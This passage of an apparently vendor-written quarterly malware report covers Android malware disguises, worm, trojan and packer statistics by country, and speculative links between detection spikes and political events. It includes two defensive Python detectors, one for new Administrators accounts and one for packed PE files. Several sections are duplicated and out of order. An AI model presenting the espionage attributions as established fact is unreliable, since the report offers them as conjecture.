Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be several. In this timeline of Comodo malware detections in Ukraine in Q2 2018, the highest spike, on May 24, may have had multiple causes. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in the capital, Kyiv, on May 26.


7.9 Croatia

Since the cyberattacks that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context, the massive spike in malware detections in Croatia on March 28 is interesting: it came a mere day after the Russian government called Croatia's decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility."


7.10 Finland, Russia, USA

Finally, let's look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this virus activity revealed that it took place almost exclusively in Vantaa, a suburb of Helsinki, which the report identifies as precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several significant new trends that are likely to influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The increase in trojan malware in the last quarter means that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with their real impact being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Together, these facts point to a huge surge in infections of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in its persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools such as PowerShell for attacks are clear evidence of this increase in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets hold a variety of valuable information but lack protection comparable to that on desktop systems, which presages new attacks and further mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (such as messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of trojans detected in Q2 were information stealers, another dangerous tendency is visible: cybercriminals are increasingly focused on hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and posture.


Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown," potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.



Disguises of Hero Rat: "Get free phone credit" (شارژ رایگان بگیر), App Master, Anti Rat PlatformA, "Unlimited followers" (فالورگیر نامحدود), "Free Internet" (اینترنت رایگان)

Its code is available on a Telegram hacking channel. Notably, it is sold in three tiers: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning such as "app can't be run." In reality it keeps running in the background and starts its spying activity: it steals text messages, records audio, makes calls, detects the device's location and more. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection and Get Free Followers apps, with Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Disguises of Sonvpay (Version 1): Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone


Sonvpay covertly subscribes infected devices to WAP and SMS services, adding extra charges to the owner's mobile bill. Once installed, the malware displays a fake notification with a "skip" option. If the user taps that button, the malware begins to work in the background, subscribing the user to services she did not order.

It reaches victims in the variety of disguises listed above.

4.1.11 CoinHive

The last entry in our Q2 Android malware list is CoinHive. We mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which upgrades its mining capability. It is disseminated via the counterfeit apps listed below, but one of its vectors is especially interesting.

Disguises of CoinHive: Version 1: Netflix Hack, Instagram Hack; Version 2: TSF Launcher; Version 3: Android Service, PlacarTv Futebol Ao Vivo

The malware is covertly propagated via ... another cryptominer, named CoinMiner.

How is that possible? Imagine a cybercriminal who wants to infect victims with a cryptominer in order to use their resources for cryptocurrency mining. She chooses CoinMiner for the purpose, downloads it and implants it on the victims' machines. What she does not know is that another cybercriminal has earlier infected that copy of CoinMiner with CoinHive. So the first attacker is herself a victim: thief robbing thief.

This story neatly illustrates the state of cybersecurity in Q2. No one can feel totally secure; even a predator can turn prey in seconds.


4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Chart: Android-targeted malware in April 2018

4.2.2 May 2018

Chart: Android-targeted malware in May 2018


4.2.3 June 2018

Chart: Android-targeted malware in June 2018


5 Malware in Q2 2018: The Big Picture

Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and to understand each malware type individually, as well as its impact around the world.


5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network; however, even worms without a payload can consume enormous bandwidth, drain network or local system resources and cause a denial of service. For this Q2 2018 report we place worms in a special category, "Strategic Threat," because of their ability to travel very quickly across the Internet and compromise many computers at once.


5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing the planet for over a decade, ranked as the top worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of worm infections.

Finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), while Russian worm detections were spread more evenly throughout Q2 2018.


5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote drive or server), from which it can infect every computer that accesses the share from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected. Microsoft describes it as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, while French detections were spread more evenly throughout the quarter.


5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers not only by mail but also, for example, via exploits and autorun functionality.

This quarter the most common Email Worm, by far, was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm problems, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.


5.1.4 P2P Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without a centralized administrative system. Such networks are commonly used to share files such as unauthorized copies of books and films, and hackers take advantage of this to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may use the Gnutella p2p protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia suffered not just one p2p Worm outbreak but many.


5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, the "IM" or instant-messaging worm, sends malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a well-known IM Worm called Yahos, whose use to spread banking malware via social networks led the FBI to arrest 10 people in 2012.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to worms, these can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. Once installed on a system or network, however, they can be devastating to personal or enterprise security.


5.2.1 Backdoors

A backdoor is a hidden way to bypass normal authentication, often used to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected in Q2 2018 was DarkComet (also written Dark Komet), a remote access trojan (RAT) that is fully 10 years old. It allows a hacker to control a compromised system through a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo's Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses

A computer virus is self-replicating code that "infects" other programs and devices, corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot move to another computer unless a user transfers the infected file or performs some action such as opening an attachment or clicking a hyperlink.

Ramnit was the top Virus of Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of virus detection, but also that many other countries, especially developing countries, were affected.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans

Trojans take their name from the wooden horse of Greek mythology, because their malicious functionality is hidden within seemingly useful or benign programs. Typically, Trojans grant remote attackers the same rights and privileges as the local user and can be used for many kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on the victim system and adds it to the Administrators group as a "Remote Service Account."

The bubble chart shows that Germany (de) was the number one country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: the beginning of June 2018.
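The behavior attributed to Starter above, a new local account that is immediately added to the Administrators group, leaves a pair of Windows Security events that can be correlated: 4720 (user account created) followed shortly by 4732 (member added to a security-enabled local group) with the group SID S-1-5-32-544 (BUILTIN\Administrators). The detection routine below is an added example written for this page, not Comodo's code. Its input is a constructed JSON-lines sample shaped like a log-forwarder export of those two event types; the 15-minute window, the field names and the machine SID in the sample are assumptions.

```python
"""Detect a freshly created local account being added to Administrators.

Added example for this page (not Comodo's code). Input is JSON lines carrying
the Windows Security event fields that matter here; the sample is constructed.
"""
import json
from datetime import datetime, timedelta

ADMINISTRATORS_SID = "S-1-5-32-544"      # BUILTIN\Administrators, same SID on every Windows host
DEFAULT_WINDOW = timedelta(minutes=15)   # assumption: malware elevates the account right after creating it

# Constructed sample: a benign account creation by a helpdesk user (RID 1105) and a
# Starter-style sequence where a service context creates an account (RID 1106) and makes
# it an administrator one second later. The machine SID S-1-5-21-1111-2222-3333 is fictitious.
SAMPLE_LOG = """\
{"TimeCreated": "2018-06-03T09:58:10Z", "EventID": 4720, "SubjectUserName": "helpdesk", "TargetUserName": "contractor01", "TargetSid": "S-1-5-21-1111-2222-3333-1105"}
{"TimeCreated": "2018-06-03T10:01:02Z", "EventID": 4720, "SubjectUserName": "SYSTEM", "TargetUserName": "Remote Service Account", "TargetSid": "S-1-5-21-1111-2222-3333-1106"}
{"TimeCreated": "2018-06-03T10:01:03Z", "EventID": 4732, "SubjectUserName": "SYSTEM", "MemberSid": "S-1-5-21-1111-2222-3333-1106", "TargetUserName": "Administrators", "TargetSid": "S-1-5-32-544"}
{"TimeCreated": "2018-06-03T10:05:40Z", "EventID": 4732, "SubjectUserName": "helpdesk", "MemberSid": "S-1-5-21-1111-2222-3333-1105", "TargetUserName": "Users", "TargetSid": "S-1-5-32-545"}
{"TimeCreated": "2018-06-03T14:00:00Z", "EventID": 4732, "SubjectUserName": "helpdesk", "MemberSid": "S-1-5-21-1111-2222-3333-1105", "TargetUserName": "Administrators", "TargetSid": "S-1-5-32-544"}
"""


def _parse_time(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def detect_new_admin_accounts(log_text: str, window: timedelta = DEFAULT_WINDOW) -> list:
    """Return one alert per account that was created (4720) and then added to
    Administrators (4732) within `window`. Events are expected in time order,
    as exported logs normally are; correlation is by account SID, not by name,
    because 4732 often carries only the SID of the new member."""
    created = {}    # account SID -> (creation time, account name, creator)
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        when = _parse_time(ev["TimeCreated"])
        if ev["EventID"] == 4720:
            created[ev["TargetSid"]] = (when, ev["TargetUserName"], ev["SubjectUserName"])
        elif ev["EventID"] == 4732 and ev.get("TargetSid") == ADMINISTRATORS_SID:
            hit = created.get(ev.get("MemberSid"))
            if hit is None:
                continue    # account predates the log or was created elsewhere: not this pattern
            created_at, name, creator = hit
            delta = when - created_at
            if timedelta(0) <= delta <= window:
                alerts.append({
                    "account": name,
                    "sid": ev["MemberSid"],
                    "created_by": creator,
                    "elevated_by": ev.get("SubjectUserName"),
                    "seconds_between": int(delta.total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for alert in detect_new_admin_accounts(SAMPLE_LOG):
        print(alert)
```

Only the "Remote Service Account" sequence fires: the contractor account is added to Users (a different group SID) and only reaches Administrators four hours after creation, outside the window. Domain accounts added to a domain group produce event 4728 instead of 4732 and a different group SID, so an enterprise rule would add that pair alongside this one.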


5.2.4 Exploits

Exploits are pieces of software, chunks of data or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

Detections of exploits can be rare, as the underlying vulnerabilities are typically patched quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo targeted a favorite hacker target: Adobe Portable Document Format (PDF) files, a format created in the 1990s to present documents independently of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit activity in Q2 2018, with Japan clearly experiencing the most persistent challenges.


5.3 Medium Threat Malware

In this section we focus on five malware types that are somewhat rarer and more exotic: Constructors, Packers, Email Flooders, Virtual Tools and Jokes.


5.3.1 Constructors

Constructors are applications used to create malware files automatically.

In Q2, Alamar was the number one constructor that Comodo detected. Microsoft rates this program as a "Severe" threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers

"Packed" malware is malicious executable code that has been hidden or obfuscated by compressing, or "packing," it inside a larger, seemingly innocuous program or data stream; the hostile code can even come in the form of scripts. The compressed data is usually accompanied by a separate decompression stub, or takes the form of a self-extracting archive, which recreates the original code from the compressed bytes at run time and then executes the malware. Encryption may also be used to conceal the code from security software, as a further means of obfuscation.

MUPX, or the modified "Ultimate Packer for Executables," dominated this part of the malware landscape. UPX, on which it is based, is free, open-source software that supports numerous file formats and operating systems; it uses the open-source UCL compression library, whose decompressor is just a few hundred bytes of code.

In Q2 2018, Russia was the number one home of malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
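The triage an analyst runs on a suspected packed Windows sample follows directly from the description above: parse the PE section table and look for UPX-style section names, a section with no data on disk but a large in-memory size (the stub unpacks into it at run time), high-entropy raw data (compressed or encrypted code) and sections that are both writable and executable. The script below is an added example written for this page, not Comodo's tooling. The entropy threshold and size cut-off are assumptions, and the two minimal PE images it builds to demonstrate itself are constructed, not real samples; point `packer_indicators` at the bytes of any real executable to use it.

```python
"""PE section triage for packer-style layouts (UPX names, run-time unpack
targets, high-entropy data, writable+executable sections).
Added example for this page; not Comodo's code. Sample images are constructed."""
import hashlib
import math
import struct
from collections import Counter

UPX_NAMES = {b"UPX0", b"UPX1", b"UPX2"}
HIGH_ENTROPY = 7.0       # assumption: bits/byte; compressed or encrypted data sits near 8.0
MIN_UNPACK_TARGET = 0x1000  # assumption: smallest in-memory size worth calling an unpack target
OPT_HEADER_SIZE = 224    # PE32 optional header (only its size matters to the section-table walk)
FILE_ALIGN = 0x200
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty input, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    _machine, nsec, _ts, _symtab, _nsyms, opt_size, _flags = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + opt_size
    sections = []
    for i in range(nsec):
        (name, vsize, _vaddr, raw_size, raw_ptr,
         _relocs, _lines, _nrelocs, _nlines, chars) = struct.unpack_from("<8sIIIIIIHHI", pe, table + 40 * i)
        raw = pe[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        wx = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
        sections.append({"name": name.rstrip(b"\0"), "virtual_size": vsize, "raw_size": raw_size,
                         "entropy": shannon_entropy(raw), "writable_executable": chars & wx == wx})
    return sections


def packer_indicators(pe: bytes) -> list:
    """Human-readable reasons the image looks packed; empty list when none apply."""
    reasons = []
    for s in parse_sections(pe):
        n = s["name"].decode("ascii", "replace")
        if s["name"] in UPX_NAMES:
            reasons.append(f"{n}: UPX section name")
        if s["raw_size"] == 0 and s["virtual_size"] >= MIN_UNPACK_TARGET:
            reasons.append(f"{n}: no data on disk but {s['virtual_size']:#x} bytes reserved in memory (unpack target)")
        if s["raw_size"] and s["entropy"] >= HIGH_ENTROPY:
            reasons.append(f"{n}: entropy {s['entropy']:.2f} (compressed/encrypted)")
        if s["writable_executable"]:
            reasons.append(f"{n}: writable+executable section")
    return reasons


def _pseudo_random(n: int, seed: bytes = b"constructed sample") -> bytes:
    """Deterministic high-entropy filler standing in for compressed code."""
    out, h = bytearray(), seed
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return bytes(out[:n])


def build_sample_pe(packed: bool) -> bytes:
    """Constructed minimal PE32 image (not a runnable program): headers plus a section table."""
    if packed:   # UPX layout: empty UPX0 to unpack into, UPX1 holding the compressed blob, both W+X
        specs = [(b"UPX0", 0x10000, b"", 0xE0000080), (b"UPX1", 0x800, _pseudo_random(2048), 0xE0000040)]
    else:        # ordinary layout: low-entropy code, read-only executable; zeroed data, read-write
        specs = [(b".text", 0x200, bytes([0x55, 0x8B, 0xEC, 0x5D, 0xC3]) * 100, 0x60000020),
                 (b".data", 0x200, bytes(512), 0xC0000040)]
    header_len = 0x80 + 4 + 20 + OPT_HEADER_SIZE + 40 * len(specs)
    first_raw = -(-header_len // FILE_ALIGN) * FILE_ALIGN
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)
    coff = struct.pack("<HHIIIHH", 0x14C, len(specs), 0, 0, 0, OPT_HEADER_SIZE, 0x0102)
    opt = struct.pack("<H", 0x10B) + bytes(OPT_HEADER_SIZE - 2)
    table, bodies, raw_ptr, vaddr = b"", b"", first_raw, 0x1000
    for name, vsize, data, chars in specs:
        table += struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, len(data), raw_ptr if data else 0, 0, 0, 0, 0, chars)
        bodies += data
        raw_ptr += len(data)
        vaddr += (vsize + 0xFFF) & ~0xFFF
    header = bytes(dos) + b"PE\0\0" + coff + opt + table
    return header + bytes(first_raw - len(header)) + bodies


if __name__ == "__main__":
    for label, image in (("clean", build_sample_pe(False)), ("packed", build_sample_pe(True))):
        print(label, packer_indicators(image) or ["no packer indicators"])
```

Section names are the weakest of the four signals, since a modified UPX build can rename them and still unpack; the empty unpack-target section and the high-entropy blob survive renaming, which is why the script reports each reason separately rather than a single verdict.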


5.3.3 Email Flooders

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" or shut them down, a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and one at the end of Q2 2018.


5.3.5 Jokes

"Joke" malware is just what it says: non-malicious applications that claim to take a malicious action when in fact they are intended only as humor, or simply to annoy the user for a brief period.

Such malware is typically labeled only a "Medium" threat because the author's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.


5.4 Low Threat Malware: Applications

In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. Comodo nonetheless detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Although Microsoft labels Elex only a "Potentially Unwanted Application" (PUA), this software is nasty: it attempts to install files that run at startup, add drivers, inject into processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application category is alarming because, in the course of ordinary computer and Internet activity, users often install these applications inadvertently. Examples include common adware programs and widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's home page, change the search provider and/or perform other actions the user may not have intended. Such bundles include free toolbars, adware and "system optimizers."

As the bubble chart shows, the US was far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed bundled with additional malware that users install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) rank No. 2 and No. 3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.

6 Vertical analysis

In this section let's examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, which were the top detection not in just one but in multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", another name for the "Zeus" Trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that the target's computer already has a virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.

7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. These agencies then immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.

7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The likely reason for this massive spike is that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? That is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes coincided with the annual joint US-South Korean military exercises. This should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of a short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.

7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.

7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.

7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April Iraq was preparing for a national election, which included a conundrum over how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.

7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.

7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detections in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".

7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it took place almost exclusively in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.

8 Conclusions

In Q2, Comodo Cybersecurity observed several significant new trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

